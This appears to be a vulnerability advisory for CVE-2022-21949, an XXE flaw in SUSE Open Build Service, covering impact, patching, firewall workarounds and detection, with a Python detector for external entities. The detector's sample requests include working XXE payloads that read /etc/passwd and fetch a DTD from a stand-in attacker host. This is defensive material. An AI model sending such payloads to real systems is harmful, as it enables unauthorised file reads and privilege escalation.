CVE-2022-21949

8.8 HIGH
XXE

📋 TL;DR

CVE-2022-21949 is an XXE (XML External Entity) vulnerability in SUSE Open Build Service that allows attackers to read arbitrary files from the server filesystem. This information disclosure can be leveraged to escalate privileges to Admin level. Affects all Open Build Service installations prior to version 2.10.13.

💻 Affected Systems

Products:
  • SUSE Open Build Service
Versions: All versions prior to 2.10.13
Operating Systems: Linux (SUSE and other distributions running OBS)
Default Config Vulnerable: ⚠️ Yes
Notes: Affects all default installations of OBS. The vulnerability exists in XML processing operations.

⚠️ Risk & Real-World Impact

🔴 Worst Case

Full admin privilege escalation leading to complete system compromise, data theft, and potential lateral movement within the infrastructure.

🟠 Likely Case

Information disclosure of sensitive files (configuration files, credentials, source code) leading to privilege escalation within OBS.

🟢 If Mitigated

Limited information disclosure if external entity processing is disabled or proper input validation is implemented.

🌐 Internet-Facing: HIGH - OBS instances exposed to the internet are directly vulnerable to remote exploitation.
🏢 Internal Only: MEDIUM - Internal attackers with network access can exploit this vulnerability.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires access to XML processing endpoints but is technically straightforward once access is obtained.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 2.10.13

Vendor Advisory: https://bugzilla.suse.com/show_bug.cgi?id=1197928

Restart Required: Yes

Instructions:

1. Backup your OBS configuration and data.
2. Update to Open Build Service version 2.10.13 or later.
3. Restart the OBS service.
4. Verify the update was successful.

🔧 Temporary Workarounds

Disable XML external entity processing

Configure XML parsers to disable external entity resolution:

# Configure OBS XML parser settings to disable external entities
# Edit OBS configuration to set XML parsing security features

Network segmentation

Restrict access to OBS XML processing endpoints:

# Use firewall rules to limit access to OBS services; replace [OBS_PORT] and [TRUSTED_NETWORK] (a CIDR range) with your values.
# Order matters: the ACCEPT rule must precede the DROP rule, and -A appends after existing rules, so an earlier broad ACCEPT would override these.
# Rules added this way do not survive a reboot unless saved (e.g. with iptables-save).
iptables -A INPUT -p tcp --dport [OBS_PORT] -s [TRUSTED_NETWORK] -j ACCEPT
iptables -A INPUT -p tcp --dport [OBS_PORT] -j DROP

🧯 If You Can't Patch

  • Implement strict network access controls to limit who can reach OBS XML endpoints
  • Monitor for unusual XML processing requests and file access patterns

🔍 How to Verify

Check if Vulnerable:

If the installed OBS version is lower than 2.10.13, the system is vulnerable.

Check Version:

Run obs_admin --version, or check the version shown in the OBS web interface.

Verify Fix Applied:

Confirm the OBS version is 2.10.13 or higher, and test the XML processing endpoints to confirm that external entities are no longer resolved.

📡 Detection & Monitoring

Log Indicators:

  • Unusual XML requests with external entity references
  • File read operations from unexpected processes
  • Authentication attempts from new admin users

Network Indicators:

  • XML requests containing SYSTEM or PUBLIC DTD declarations
  • Outbound connections from OBS to external servers during XML processing

SIEM Query:

source="obs_logs" AND ("<!ENTITY" OR "SYSTEM" OR "PUBLIC") AND NOT expected_xml_pattern
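The keyword query above matches any request containing the word SYSTEM or PUBLIC, which also hits ordinary element content. As an added example (not part of this page or of OBS itself), the following Python detector narrows the check to external DTD and entity declarations inside the DOCTYPE and runs it over constructed sample request bodies shaped like OBS API calls; the request paths and payloads are assumed.

```python
import re
from typing import List, NamedTuple

# DOCTYPE declaration: root name, external-ID part ("head") and optional internal
# subset in [...]. Case-insensitive for robustness (XML itself requires upper case).
_DOCTYPE_RE = re.compile(
    r"<!DOCTYPE\s+[^\s\[>]+(?P<head>[^\[>]*)(?:\[(?P<subset>.*?)\])?\s*>",
    re.DOTALL | re.IGNORECASE)
# External general (or %-prefixed parameter) entity declarations in the subset.
_EXT_ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?P<param>%\s*)?(?P<name>\S+)\s+(?P<kind>SYSTEM|PUBLIC)\b",
    re.IGNORECASE)

class XxeFinding(NamedTuple):
    entity: str      # entity name, or "DOCTYPE" for an external DTD reference
    kind: str        # "SYSTEM" or "PUBLIC"
    parameter: bool  # True for "<!ENTITY % name ..." (parameter entity)

def find_external_entities(xml_text: str) -> List[XxeFinding]:
    """Return every external DTD or entity declaration in the document's DOCTYPE.
    Only the DOCTYPE is inspected, so SYSTEM/PUBLIC in element content is ignored."""
    m = _DOCTYPE_RE.search(xml_text)
    if not m:
        return []
    findings = []
    dtd = re.search(r"\b(SYSTEM|PUBLIC)\b", m.group("head"), re.IGNORECASE)
    if dtd:  # <!DOCTYPE x SYSTEM "..."> pulls in an external DTD
        findings.append(XxeFinding("DOCTYPE", dtd.group(1).upper(), False))
    for e in _EXT_ENTITY_RE.finditer(m.group("subset") or ""):
        findings.append(XxeFinding(e.group("name"), e.group("kind").upper(),
                                   bool(e.group("param"))))
    return findings

# Constructed sample request bodies shaped like OBS API calls (not real traffic).
SAMPLE_REQUESTS = [
    ("PUT /source/home:alice/_meta",    # benign: "SYSTEM" appears only in element text
     '<project name="home:alice"><title>SYSTEM build tools</title></project>'),
    ("PUT /source/home:mallory/_meta",  # external general entity (local file read)
     '<?xml version="1.0"?><!DOCTYPE project [<!ENTITY x SYSTEM "file:///etc/passwd">]>'
     '<project name="home:mallory"><title>&x;</title></project>'),
    ("POST /request",                   # external parameter entity (outbound DTD fetch)
     '<!DOCTYPE request [<!ENTITY % dtd SYSTEM "http://attacker.example/e.dtd"> %dtd;]>'
     '<request/>'),
]

def scan_requests(requests):
    """Return (path, findings) for each request whose XML declares external entities."""
    return [(p, f) for p, b in requests if (f := find_external_entities(b))]
```

Run over the samples, only the two requests with a DOCTYPE declaring external entities are reported; the benign request containing the word SYSTEM in its title is not.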
